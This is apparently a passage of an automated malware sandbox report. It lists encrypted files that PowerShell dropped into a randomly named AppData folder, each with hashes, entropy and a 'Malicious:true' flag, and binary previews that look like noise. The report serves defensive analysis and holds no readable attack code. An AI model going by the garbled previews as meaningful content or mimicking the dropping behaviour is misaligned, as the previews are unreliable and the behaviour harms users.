                                                                                                    SHA-256:24321ECC18A2F5470EFF0FF618C0C2EBB637B7926E253B6A0E8D378B5975EB53
                                                                                                    SHA-512:242276EA0658A18087FD46B7B4CAB176B06CB3F8076F41C8BA8E13BC4646BE4B07CFC5216DF7A85DF51EF07D6651AA1720CFB861DF9D0DFAF2BDD04725E6CD79
                                                                                                    Malicious:true
                                                                                                    Preview: ....^.....|..F$1%x...J...*.......9>.M.Q.&I..(^.G7...u6..r3.("..A..V.'.P..K....}...........g.>.J...S2..].5..~h.....-..|b.....p..1 .I.. .../...V.~=....u..Ct.r9'q6..<).kw..M..T[--...T.;.X$'.B._..(~..B..QA..':...G..6..g....5!.W1....o......V....r`N..L.^....s.....@..}.......E.:,\...[.._&......D..D.....Eix.a.'.G..%`..u.....F..jG..9h;-.......2H.D..K.|.;..:#|..;?..#.....3......5.....h...4.w....huT:..5K.Y.._.$x..*q?%uP....$*y.t...I..P.?...B...D.(O..Z.5@./...^..c ..f....`.C.KC........B>....=.{u.ix\....8qJ.....T.....\.KvI.p{.R....(@J../...[%....e....-..p.j....A..i....D..Q3..~gv...8..@......'....C.....!.A...Qc4t..Lf0 .V\8.Nu._#.$..:.A......B...k...d.2....u..k.>.qh....K..H...<.Z.FD...G.4._.2..wi....+..%\^. e.k..%G....m}....c....r..p.lt5.}...2{n.s.-WY..+M..H...d.:...+...E.@q+..<...ml.{..~Ri.....p. ..ai.p2.G.T.x.....\jp!....j.y.].S.L..mJH.t..h.;..+.{.~cl..h..Q....%.>=.2..Y.....Me/N../.c.. .b...#.Zz..Nb...$g=..r.c"....QT]A.-o..U...{...L8.....Z....&>.|(.h.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xqZFGPobdYlzRJrhm.TaMrvmsbdLucUY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102953
                                                                                                    Entropy (8bit):7.99817739929451
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Zag49DhGU5T40GpPFYTJCHuGhjChdHXsTnAkM:ZKhfGLYnAuoAkM
                                                                                                    MD5:C707B925C1170237928CA86EDD251678
                                                                                                    SHA1:B1CB675C99DA11403864BABC51783020D6605E82
                                                                                                    SHA-256:250BB89E38FF06122411869D60007376AA15355F17489DCABD7E8B982385CE19
                                                                                                    SHA-512:561165DDC76ED39B9D0E00D090C4FA6888FB94D340BA310555D522F7010FBA4A1DE63F9E35E6447F853519213D41D17E0D51EBF51F9A84E18920A367F2F4EBBD
                                                                                                    Malicious:true
                                                                                                    Preview: .M.(..........n.Z..1.9D...zg...4#.r.-..V..`..-..m:...c..]..l..F.o....B.)..8..8.._..a..v..0....^h?...*...=..j.f.WD..T5.c..;.~...y"g...u..&NkC.G....l.C....\....g...k...:.<../...9.....d..J.m.V.W........gK.....f...K.V....b..X.s.H...-<..zK.\.ey...a......!.\....sVK..d..Zc....\.<J...@....C.U.X..H.-....*....j.s._.d...t.&Xu.......M.....d.2.f..&A....c..]pP3..!...N.......{B..?.....U..T.)4Q.Y.yA/..Xn..!#[~v..e....k...c...F...e.5t..>Y4.&.`.@CGC\S.q.^.Q?.A.|vc......Tqe$)..u......q....e...Y...eR.g}.Q..9.N=~.....[%.../aT....J.I>-(.mp..Am..N>..KX[?x.G...Xn{J.nZ....7..t..I...H....3.^}.Co.#.w...o!p.|...F.L%.....l.#~.'D...Q..v.sX.~.T.P...,.I....j2...gIr....u.!6.Z...5..f..MC.....C..g#4.d.I......rBS4c...NO$.L..}..=...Q...?:.5..E...e'...hI7%.-....ucHS^..`..gia......l\.....[...!.S............KR...f..K.]Z)....EV..kg..._.r^..-R..^*t......n...[.............G-..0..>..f...a.....d. .wM./p..mA.H.+.....M`.J....N..#.?.....$.J.P..#.....k..7.....x.rq..{..4...{.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yApgcBWNRek.hNoCKMdHIFbWsV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74586
                                                                                                    Entropy (8bit):7.997754347011361
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:CffTWjXUy2aVjnX0N4SlHAuIG13I0vpIghV6AF6A0OtkN:YKjk0VTkNXgsDI4FjkN
                                                                                                    MD5:C52E881499584643081F5912B2001C3E
                                                                                                    SHA1:2D3EEDA306A46622178F597EA8522AE1BE41DE39
                                                                                                    SHA-256:877D401028A72B1EDE2DF81B9477AD9BD4D406892E14F005E45B06B6C1A1946B
                                                                                                    SHA-512:780A15C254048ADEEB0CA7A0D78758818B9F49DC45CCF1C9708F7CF222ED81031242B32194EB5FC047C50ED6F03913B3CA6844310A4CB1C60B59D7056EFE795B
                                                                                                    Malicious:true
                                                                                                    Preview: .I:..v..b.0....?.....D/.#..q._..-.......c%<..P.v.e..R........o.i.sr.D....}....f0.....Y...A.D.v.........mQ......&Y..Hut..[^z..]JP.h......X.........S@....u.U.9.}A'A........0.l`r2..',...P..6d....nv..&.W......e..%U..L.@....F.....U.a....`..sA..Z..*TF.......g.+.OL.t.lf.fPq.aag$3...eG.-.....7...Y.).....2..m1..OJ*r.fW.M[...D:....N......E......6..~..aP..\....$..>H..s!\.m...A.M..>..Y........q$.}.sc..!.J.G..Nyb..Y.V&.8Y.......$G....z.*.Y.l.fVa...=d........0[=..y..^.$.N..0.%q......%K....JYn.c.9..M@..t.k..~c.XR.{|.6S....n.....[=.`...8 ..$Lk5..?....9.0Nj. ........mx......#9.s..X.s...~../..Zc.G...Q...R.k+0...,b..72...?.h.i.....VyQk.!.%.M.}F.j.....W:o.l..k......CR...=.U."....$....>....$...+...p7.S>.q.<o]..`].QA...6bv. .}...Q2..R....X.W.!.nV4.'.......t.)xM<..o......T...qd.&...R"...u..X+/4.LR..m5D2!.mv..9..vIkd......%V...m....0.iux..Ts...b..z...'.SH .N.(U........m.....?.[>zd.1.8... T.7.+..E%....l...q.@..-...?..j.%.c.~.a....hc.{..Q...r...&.g.l...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yBdqUfkusbIrSNG.CTnqNUAEuJYpGLaF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128795
                                                                                                    Entropy (8bit):7.9986596701099755
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CIeu/3v94Fx3zPBzoe4S7GUqdLXso/SoRKJX2X41WX:t5316x3FzvUl8oqWX
                                                                                                    MD5:29D1D16F0B464892C8A713040E51B7F8
                                                                                                    SHA1:99502AFDFB15BE83C86B9ABD384DC51D5F8E4913
                                                                                                    SHA-256:71CA8A4C7B35F7E19AC9AC433A84A3E45FD7BE661E56EDA644F3D43938F4176B
                                                                                                    SHA-512:D7739100D0FE1D846E54633DF2604599E6C2D35C56121A1CA8BE554018692A0BC715E86EA8E9520B8F0223264EECE0960580870DE1567D1511992A8D1F1E8A7B
                                                                                                    Malicious:true
                                                                                                    Preview: .)/R..^.....A.....8.GbV]&P.d..k.j.oP&.8.`...2...kcf..H`...+.\.....*.....R,.D.C+....5...!^.|T..g..x.x...ZR.......r....q.%..c:.}VB..y.....Es8.B..*.<g7..?o.V.H..Y4...,.q..A.a8r. ..D@...':...CA%..ajZ'......DB.......D.F.........vX.wB.4./.n...2.............:......v.^..~....cYH.Qt...n..... .....T.O..HD...'.I.D.....M...uC...<.x.@..<J.........}..g......s..N.2.thT..Z..H......x.<...[p.k..v..miE[.kE.e\.oM..2g..5b..x...5g.[.(TF.h_J2=.%>.....aX'p....y..e:.%m.....U......6...q.I...........AU..Y..x.....P.%W.8em#..CF..a..{7....;~.?._.. r(q...O{.T...s6..d...[.<....-Z...&.s.0...=X.(.i(..}..(5.]..M......(.......j.\._...K.Wz.]K....;4..^n....eP,.b-Hc...\OwmE.=x.n7...z...8.....i*.</..........]b..%-2|..wBb.-5o^.....H...e.O..s..~e..7..U..M...o.....`9]gu.tQ..z......l...p..&.......,.cCk.N..............}.i...A......aiy...V.K..&$Z.i..k.z}....D.J6...`(....[..:.%..4.& ........W....V..2k]....C...F..#...ry<.%...:%.......}a..\..I#.G....T.J..8...CO.m..F.NZ..O|..&....&.zc....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yKhcmtGOVHQz.kGhaLzHnKDUvPTgdRm
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:locale data table
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57380
                                                                                                    Entropy (8bit):7.997113893681033
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:4J7Kt8YbFwlGb1ItuVK0TMh1Dvdun3cNHZt0i/xqQei:YYjFoGJguVhTMhw3gHZSi/xp
                                                                                                    MD5:1BAA26CED5C598BF2CAA35E75541F9A2
                                                                                                    SHA1:BC0F5F238C02A25BFE918C70BA8C502DE28F7BA3
                                                                                                    SHA-256:BAB2768E2BB46203617D4982E99B367C7F1E7F8D115409321D99EB18A069E658
                                                                                                    SHA-512:ECAEAACF1E41B74039619C009BF4763EA55EB6C9119C8DF6EB12889D053655557A26EAA060E668FB490E1BC3E91106891B268E70BC3FA3946225AFC3E3A66E17
                                                                                                    Malicious:true
                                                                                                    Preview: ..a.?H.hS.......z.v.m.W.....)i`7..R...6.....L.hK....'k.#..FA.L*q{......y_.C>.p.G.{^T.`[/.....I.,..................&...Z..\............G.uO...Q7...v...f.J..k...)..E.$3cU......4$.4.+.....?B................[-...G.....v&*..y.f..."o2.r..`.$....:...."M.b..e0J..\.hh.<$...Rb.>9..T....!f'. .0...G.Nu.....>`.i...K.6.~.hF....1s..v>g.Ye.f...&.K.c...b.......]t..[A.7.=.1.R.?. ..0...V.ty.*...J..D............. ..D.<V.W)...P....a.;...2.7..Z...t.E.+........B.aM..x....'C...........@....d.....}OG.._`....n.....=J~....j..1.)/..w....!....m.........%.O.y.X.d"....F%.(..8%..3..q....G.fg...."...@.h...6J0..}.%..]3 !-..*.T_.G..Z2...9.v.efV0l..@.N..4.>..$b...4K.2....#.......u.(....\.!...b917..q.I.1......(h.W..etX...I.d{....J.,'.*..?sy9.p4..Z.._.1..B<2..K..n..a/.Y!.5..UH...B.&ZM.p...l.;'~U7Ros.zY...L...c..i.(......+l............xj...^......U.$....N..........@.SOLb&.q...'.@h....Iy.c......#.N.C.4.\........P...f9.%.G.gm..3.,...$..r;e..UN...T...q...T.....<.9..14+...*.*....^...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yKiaAdGskN.bePNkQSFozIpEahHcy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170491
                                                                                                    Entropy (8bit):7.9988960366295725
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:KF9m3qOEbPQ73VgS/VZ16k6OrEbI2B9QNvNR1hvpnavfqLPG5:4mAQnIZlbH9ivNR1hMAe5
                                                                                                    MD5:260BB1BC5168F4D5448DBF05246FCD52
                                                                                                    SHA1:E2CB547195F6FD87E78F402838423BF5302D7570
                                                                                                    SHA-256:3948AFAB57916717111B6755330C531A364AC6367F406C43A462B8F41D4833A9
                                                                                                    SHA-512:06C60BBED8EADEEE108C45A395308FF211274AF957F5C809D8818B53ADBC977BFB82F8456998FDC4081E6F7A9FC16DBCBE5FA56B6DBEBBD86ECB34C1DAE1D369
                                                                                                    Malicious:true
                                                                                                    Preview: Tv|>..M_.7.[..O.'...j%....Z.._dU....Uk...t........'F.j..(..E...j[.3..qX..=.}#..L..~.k....C)3:....E...(.4]},./......K..@..(.....AB...H.....!..y=(.A..n.T.>...Pv...[(c..cdL....O...7mSM....Q.._.......?.!.r.@...J>A4..u._q...dO..@D......^...c..e...uO61......W.-..d .5...#...;.e h8.f...F./.'U.RYsY.E....9.|8.G...t.........a.gb<..*..LW7x../.2..lG3.@..k(..w....f...(.GNa....9.U /b..1.o#|j.?O..#..^.k.]..x.g..."....3..J.`!.r...F......)3...&..,x..Q...!...g...!N.,.&.u.x..H..:..F?...y7.....-..d.<............:AYH.........U.....?..&..G..p.K6n=.\-......#..|.-....F.>Z..v;...d...Q......k.4B.eC.J.$rA..N......UX...1.....G%k.....4u.+Ob.....\dS..Mg..d,.Z.........o...x8....K.F.=.>..H...\...j......Vw..F.Ub.8>...........\.0..Fe9<...X-&2x....}..bDg> ~2.xm..ne.......kFj.....Z..!7~..'..o.$.n2..b..j.......o.|..n..7..0.=-.G\...}S..].......2.|._.,...D.D.....p(.I...^.O7.l9.@.l#aP..#.....+.(_.<....r.{wy...o... ].%'g.A..p...ng.<_..O...Bm8giJ..?n`.{..1F...P.B8.5S1..:
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yTajVxHXOlBhwGgd.gzUDAbLthKqwlI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66960
                                                                                                    Entropy (8bit):7.997149160909514
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ojeiA4hVHHTPCFL9TZD3r8nJDLUOO2+i5pOojmZT24fp:ox7HHselJOs5YR524x
                                                                                                    MD5:1A35BF59554557D2F6AA6DF64DE9848A
                                                                                                    SHA1:31BCC1826AAA37D3ED11D4B41EE1167A0726B22A
                                                                                                    SHA-256:E397F9AA1D9F97C60AFB0E816503639D4DCF11E1125F7E2503323E9160A21F3B
                                                                                                    SHA-512:35F01E86228B39100B48A8C2723EDD2E587A47606C480604E3ABA86C09A9BF10498FB2E7C3D7353E005F383F8F17116423AC7E70EEFFC334957B9741210C0582
                                                                                                    Malicious:true
                                                                                                    Preview: [Vp.!R..Qo........6.....*m@.p...R.W...c..x......iT.8..0(....,+..J....f.a4.O......*pZ..9.....L..!..q.....,.....gG.j.0.`.N....[....O..l..Cu..z.DV..\.Q..-..N.3..X+.Ov.h.....S.....M..+i..=](y3'..<.N._.z..t.dJ.X..]....,..S9~?.....!.....D..g...Fx.Z*.2......]...6\.....Du....x...`....;.d..................k.eB....c.Go:.d~...."..&..e&..T...[.-.2......|=...W ..:..........h..Y.w._..:l...4.{*|...gF!.,.0...*.r.,`....~.a....Vj.J^...U.2~..g..(v.b.X...R...t....w.x....zV.$.L.6Q.O..MG...M...9.2.v.....-.p..,..HG.<R.~k...N..~..Ku8C7?.a..._v..j....I.....R4S.....o.....A...$.+Po..u;.j..|......L.!.Z.#...vkf-&......k...K2.dx.....d.^...x...RO..+..W.c{DSM..J..p...`...g..JlL`.y(Y. .....-_....w]..A.p..S....MT f.._......:.b6....].8......0...\...Qi.......'..\..,..7...5.(.}.<....x.>..J...!"[...:H....J.}..B.zJo.Vo...).:g.{s...T.L..f.J.(..=_.up.%....`.-R...vg..--..;%..O}..,.......uW......D.q.G...g....~v.a...W9A?...h.@<8.j..O.P.......[1.}k..g.{3.%....i...|t.D
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yXGQHJUTtaZwDsgPK.etYhpLgwsBPzWIdG
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65275
                                                                                                    Entropy (8bit):7.997127414806795
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:uvshhFPxDAllyEiOtZZMUDrzHf+xus+tU:uEFPxYEEikAgr6xussU
                                                                                                    MD5:1161EF9E6F6FDC356251320963BC72A2
                                                                                                    SHA1:644CEC990E7F16AAB92978DABE5236C7524D0EDF
                                                                                                    SHA-256:18C7829BD68148675B07D502D6A5171EC4889ADDD1A9A16D1B869B0ECB778BE9
                                                                                                    SHA-512:B527FA7B0A701F995BD551E81E04E19913DB890180C2AABFD3632B42A35DCE60456735C2055C4A7A4C377DFF871DABC573C38A1D8581D3C50290150232D01F17
                                                                                                    Malicious:true
                                                                                                    Preview: ....^].$.....@.h@5..y^\...]w...0......M..B....l..n..".$`.......#.X.oVV.v@6KG..N?u....R.0Xf...8........x.2.|...jT.._.`G.t.?..<]$..V.....A.T...~.VX.....0.R....~!.'..J.....<&....6%....y..y....W.VW..D..J....b+....X8.].1..Q.s1G..(.9......*.f."3.e.`[..{<..i.oI.[r....@.,..H]Qr.Z..HCt....[.eS....l`..q../q$2.I.....{.C..M.|.4,.qF.H.$Z.}E......GU...q$)f..#.Ih=..mRC.K.Hw...UT.@.4q...."....7.4....8.....$s...a0......ym0f.<.......P...|g.G.9..T......i..s.]...g..\.......-......&.....r.,....h.Y...W.0...<,>..A..v.K.`j%.......u.R.v".F....]E[e.J..&.Q..;ab....C..Lt=..^/...[...n.. .i...,;.":........K.......;-...=.A .....;.K...[Q.}<8..s....?Z...I6onc.:..a..'s../<.[..n..H ...YU.Od..(e.F<.r..O;..|........q...c.$<.L..Y.k.[.4-.D......J.....7;.u...U...@.6.E+Q.I,7...w..Hs$r.3w.?.6.....y.v...O..~....q.{........l.=-../....p$0.A3..s..K4.%}..s.O..j.{T..}W$.pm...(x..@...1.".3F.....`}9.9........B't...`2.#...#...6.o'.{K..)!.........v.....J.2..J{I3.8..W.g.t.F..2.v..D[AG...1z. `.V.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yicVjkbxqXsEHlhOp.FHXvtRKNqugc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116926
                                                                                                    Entropy (8bit):7.998366391264243
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:mJhHLfPi/aOeO7kUlHYICP59OYehtqhYGGWJf0v2e5:YhrPi/7erXkhgGO7e5
                                                                                                    MD5:5C635BF6F76DC2A3E2007DC8B37E1231
                                                                                                    SHA1:E54CE7E6752B943E6DDA0F1E51E1C9019BDBB68A
                                                                                                    SHA-256:30593CEBF755D0B857B5E0B59D1B9C3525E0123EEC8650E2DFBE5F58263D59E6
                                                                                                    SHA-512:BDB98AEF2F334B302836E9CED216D1482F7687DFCEB83A83723DD30F91AADCF5BB1E464489A4EE953108813D30EC672B9807D5E519308C4C159BF32206C5C674
                                                                                                    Malicious:true
                                                                                                    Preview: .J..H....y...P..<......,..Ok4...s..[.W.&.)...._....U.P*.:..fU.Y}..X..X*.X..$27....A.#.!Yw..<...2S.?l.....N.\....%5<.7.n....3.!./x.1.8+0L.......i......Q......;..G".).....,.h.....5..Y..y.oOO2..,..c.{^...k..+.F9.I......|.....rm.1..R6......W.....^...V.8O.?.2..x..... .1%...WX...c.H.....!..%.........v.$]...gY_.)../.......a......k.@+z.g.WV...(h.Ad...f...v..]..e..p.7..#.P..h89..{H...kEL..............5...:.>FZYM..*T!*....W....^...qix..U.x.[.q.?g..y.MU.SYFQ.S..T.H?&...9..@.(.=.<.$..s$.C.u$#{..Ld..Y.....f.s..W.........|.....G.......w=....7%5.}.tv...Ix.3....T.\B.9....x.:..Ea.......+{...8...E.....j..i.n..Sxh.._.3d..z@S...k}...2.f\s.R1m.=.<..Jz.T..,..`d.r.,TI......!..A.=....z.(...v..Y..@...}.^.w*3m?..L.e/;....."....17..I..6..y...k......{W. `Gj(<.o.k<..iP.k.k....LZ........H/.q,...}c.FZ..K..B.OY..=..[.'....]E>./.pCm..!........l...,..;?....~...U....=a...36......O1.=z..Q$_8.sG.)E..c..%-%a.....t..]Y..nx....!..l..*x*......%3......Y-.ts..#fe?...V.I...N..U
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yxzIOePqZgWV.FZvxrjuBcshmCQiXz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):59708
                                                                                                    Entropy (8bit):7.997174498844205
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:hWZXdLi7BX2eusXldUw7OxGJSAJwx6YyxFVHtiAuwl/EkVe0JVTgbplMwdejngXz:8bkBJuq/Uw7OeSOYy5tizb03fwdcgXtN
                                                                                                    MD5:113F890282218F733F6FA589785FADE0
                                                                                                    SHA1:78844A416CA41178CFD8749085B5E5E43A7A2BA7
                                                                                                    SHA-256:94FE6D8A47E47BE40112CF32AAB202172695396FC816DDD4261C53027F2D29E8
                                                                                                    SHA-512:B210B67F596A8E0FB94EDD2A037DF073F50E6D349873A9DFA1E495A9FCB00EBAA651F2F2A293DEEE6E2FB00DBC43F69DA7BA8BA04A4A1C601AD90142B055E76D
                                                                                                    Malicious:true
                                                                                                    Preview: .!...{3...M.t>2..2<..,.l..$....9...Q...QK..6...Oa!6...L.}....&.B.;.aGn".....Ph..sxX..8...J.C..M$....O....*..^6..D...'mW.e......7..v...#pe.6...%....0.U.lNf.q.X..E].a.S:.x.iZ6J.]...^J.uf2.s!..e..h., .SjG...p6..8.!{..../.....]..e=..q.m..z..nM..D...8E.....:...g.n........m.q...p..I.._...2....l...2..C.-.'..dg ...|:N]f."..9.ou.....Ez....7=...])..v.'c....~.F.yg..|._.\Y.TT>....x..Z....4.....=.di..j..4....C...?....:..*.^.].4.1GC...&m4..d...@6..Y..f..I.u...S.J1...p}~....x.n&.I-y.07..P#EF.I....j...:.L...]l.Nb......=O.L77.8{fb/_..Y.>..>....x.\.4..-/G...`.%..= .Kl..5.O...r?sW..-.J...L;o.}.*.y.e,t.5f]Y..5.c.i.....d[.`^.>.j....F.`.>.L~....../+..b.......U0.....o..b.R..s.R.*.:.C.x}.....[......Q.$u...=.......C...(...F....2v..*.v.l..h..l....%e& q..~.......Q.fU.P....[...;.'*..O.^a....'5P....&.....m.l......=.... 2H.}WE....2.u.=2@..$::.N.c6E<w.....F;.q'..\...x...c..g..\....f..t...]..P$.-=.]._.VE.........}..wL.........C:......!.....1..O_....C..R.<...Ab...Rtao.PU..f.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zHIyjvMFtdYk.geMbQnDuPof
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55066
                                                                                                    Entropy (8bit):7.996835811785206
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Lv753qaOKRsJhCUczsgbbdN7ubyxKuxISD0:LN3qPKR3UMsgbbdN7uuxKi0
                                                                                                    MD5:74ADBFC39C183D88E0F36923BBA374B9
                                                                                                    SHA1:01098B22DABBCE4D663CB563E4D9A7453D14678A
                                                                                                    SHA-256:A9E76AAA9B47B537E383AA3BC279FC7C3FE41A14EE86CD83201CD061BCDB19E8
                                                                                                    SHA-512:7E2750A802778AD903CE46A64AEC97220479B8A3D1C54960BE56EB2088032321106C8C1F050032AB1FA2B1B4D48843CD381C05D1339CF33CE779530706ED0B85
                                                                                                    Malicious:true
                                                                                                    Preview: {$.X.g.[..db..E.;q........J.=..r.J_..%..!..N..t.A.E_Rl...Q...|..X..q.......M..HC..-.....|.c....\i...,<...uj2.hi......m..8.][...y....N}...".c(.....ID..0o....A9a.....@../...>_~pUY..s5.....Le....LN..+W...k}.G0.....rj:.~.1*.9.6.Q(..u.)..mY.#Sb....U.n...-{PO5pi.>u.......Z..E.q.Me=.....>.....C....Y.[W1Y/:,.}.C..+J^.%ka.z.......e...|.H.q...<....HL.:...u[.z.I.&..eJ..j.^$.......U.&+....Rq3.a."..As*..(@..'.K..y......oI.].7.....&...g....bm.5.n.}R...6..*a:..<...A$...6;...p.V.....x.[.c..'...eJ...x..o,....e..6..4........%.r#...X.e./..6.)....=*........V\4.0q.....ed.[..k..L".n.s.&.....E)....,N.1.P....O-....4a....)..I......f.e......G.Y..s.q"iH~..S..R.p.ze7.@mCE......$.b.....^.k...6...Yo.S"#...+y.9.j..B........W=..........>....8....n.q..}p.L..?........\.f.X...v5...6. ...N..vr6e..P......1..._v..E.E....*.\..M...$A=...$...U...-U.......L;...._.8.S}'O.....{l.&...$t.?..(......).`.O.-.N...@#,.9Pu.;...]q......;Q..qZ.Y....A..|.....)...=.(..!.y.m..8..d.'...).H.8.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zaZeXJPrtBkvbosUM.JUWVxkLIovmRlgibHS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139997
                                                                                                    Entropy (8bit):7.9984662063837195
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Y72EXtTQb0ln7LuN/jFi+jZQ/1NFomT1v/lKcknNpl7:Y7rXKb0978Uim/1NFomT1v9Kbl7
                                                                                                    MD5:886CE507767FC0564BC006C18EEE599E
                                                                                                    SHA1:C28DD5F5D7B3FB151BE1FAE40CBBA75C373ED9FF
                                                                                                    SHA-256:1FE803A7CC1662804B96579351DB93CD59B5C5D99B4959B7B8A505EE781FC11A
                                                                                                    SHA-512:6FCA2CE86BBA1B362466CAE9C81B0BCADEBA181610C7605EA982E521F027B469D693B0F6470FF75458AEB083E03593856BD1157606E395A7F3A720D3B75ACDE8
                                                                                                    Malicious:true
                                                                                                    Preview: W..b..V....M-.)?F.A..Td'...5..y.......r....9..........Q....j..;q.D7.ZU..UR... ....g.S....";&>....D.G/.S..............FAo..../.L4..f..8..WX......eY..>..bl..-.......%..<......M..>.Yb.e3sci....t.p.v3 5.......#...(H.iB>..1].d(......T.f..H.6.@....I..-..A../l.9}..X.T.@...v.|.I.C......hFv/..U.<T.90.3...2...s....a&.WF.J....gt....]....L..t......"......'......L.hJZf.MG..:...s..@k2t..............q.4.Z3..#..j..$...uS+.2.B..ARk.........M../...S.....B..h.^YBh=...l..T..M.......z.lo...[.gst1}.`.8-h....._;..e..........V..9",.`wz...W.7r.K....R....I}...,.&....c<..v [|0v...._:.-Q-.l:Z...KfgO.4..A.....L/+..Y...J..5?`]..^.0..U.QD.a}n.`.=...h.....J.A%.#=_...y...~.3..#N.J...D....:=?.....:..` ..Px6*... .i..=.,...woA.$^.`.../...<.0l_\...M.......+h.j..T..R.............Z.$?~.<o..-.-Ifu..E. #......`.3..N....W...z.......I.9..........g_...X.=h';.".-^.c...S<....*.Tb...WE..Y...i....}'......#..K..l...#6t...V.Br......E(..C".!m.=l....t.i~r.)..P.....I..)0...=...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zvXKQZSqLfmIYkHorsF.SyKvELgGXcBhboYqjD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88013
                                                                                                    Entropy (8bit):7.998109319834099
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:DxgbtO7/KrT+gCVwDPlQvgsRNK0BQZPOsfQ4Yd3G70zYIPoy4PI7Kt:DSbkDKXjCWDPYNK0BQZPOsfAWUJwdIS
                                                                                                    MD5:5FB5EB1C45B7C24AAA6D06B723CAB500
                                                                                                    SHA1:8BBD4DDAC96D4D45AFC2960436AB74C495677228
                                                                                                    SHA-256:0A1226E5F3F720F1B245454F00A6DF3EE9356BDA6104A26644C47A10A40A96E4
                                                                                                    SHA-512:348FFE7761447751A1B1DE2185C6DB384858BBE8BBBD4AFC496F5FD688078C025DAC862959981AC3D42DF18555ABA3908ED12CDEBF0A199DB58A645999951334
                                                                                                    Malicious:true
                                                                                                    Preview: |..........ly...B.|r.]..?...V.k.../NA....8aN>N...MB.....+5].i.Z..i.b...5..q.B..M....zm*..#.0.....;..Sq.....h".m.Y.Q.5.>.Qf..=.S.f.f.`.am".s>t.;w._2..|h.......~...C.c7....x".oc*/......<.cV.Ux.?s..2.I`'........I.9....l...bk.8.[.02.`.0.[cL?...u..:..`..`F.c>...K.l......tn.-C%....t|..B..o|....kp....1&Y.6..!.v..._..k..z..W.$..2.%.+.BU...[.N.3.%y..+.\..9...?..H..P.l7.z.._y.,......2....0..=...n._...A.'.Y.....<@.g8...;..<w.f.l.Q...i.....b<...e.6.w.\7}.q.=.x.?TCs..t..=.Z..<.-...U...V.S be6.^......w....~........I!..qK.....>.p......ir.UtE.u....K....!l3:..f....#.^.y...+6..j...q..>.M..fCwb..X.e.....O4.@. ..^^..IM.....Q56 .wO..............s~.._...]...?......_.I...x...a.......v.....f..C.1...`..$<.zSn#.&..7....HP...g.E.f.B.N...z...}.3.k..]..|v~..U...4..8x..;O.l-.L.:!t....(fa........uj....G[.[M*.m..........'wr~.m.....=.g...xW.....0B2...........8'......8T...z.<A..#."ZA..1....../1}$Y.....@%...d\..v.Aq........<K...H.b..U'W."..M.F..|...e.!/.%._.O..G.../.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5343
                                                                                                    Entropy (8bit):4.009664379318437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:l+36Q9lB+N0C9PpMCAlTjkuGWVyYSoc8/9SogZoaSYSoc8/9SogZoOH:5Q96N0ClpMCAlTBGWYnzHinzHD
